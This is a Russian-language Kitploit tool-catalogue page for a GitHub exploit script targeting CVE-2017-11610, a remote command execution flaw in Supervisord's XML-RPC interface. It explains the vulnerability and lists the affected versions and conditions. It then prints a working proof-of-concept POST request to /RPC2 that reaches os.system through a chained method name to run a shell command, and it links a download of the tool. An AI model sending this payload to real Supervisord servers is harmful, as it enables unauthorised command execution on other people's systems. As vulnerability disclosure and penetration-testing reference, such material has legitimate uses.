Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-11610 — Скрипт уязвимости удаленного выполнения команд Supervisord | Kitploit
Инструменты/GitHubGitHub/yaunsky/cve-2017-11610
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubyaunsky/cve-2017-11610

CVE-2017-11610

Скрипт уязвимости удаленного выполнения команд Supervisord

Репозиторий
4235 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Скрипт для эксплуатации уязвимости удаленного выполнения команд в Supervisord (CVE-2017-11610)

Описание уязвимости

Supervisor — это инструмент управления процессами, написанный на Python, который позволяет легко запускать, перезапускать (автоматически перезапускать программы) и останавливать процессы (не только Python) в UNIX-подобных системах (Windows не поддерживается).

Supervisor построен по модели клиент-сервер: supervisord — это серверная часть, supervisorctl — клиентская. Проще говоря, клиент отправляет команды supervisor, которые вызывают API серверной части для выполнения определённых задач.

Веб-интерфейс Supervisor часто используется многими — это фактически клиент supervisord. Если маршрутизация настроена, можно удалённо выполнять через веб-страницу операции, аналогичные тем, что делает клиент supervisor. Операции через веб-интерфейс реализуются через XML-RPC-интерфейс, и данная уязвимость также связана с обработкой данных этим интерфейсом.

Условия эксплуатации

  • Supervisor версии от 3.1.2 до 3.3.2
  • Включён веб-сервис и порт 9001 доступен
  • Пароль слабый или пустой

POC

root@kitploit:~
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

Данный POC не возвращает результат.

Скрипт с выводом результата

a

Скачать инструмент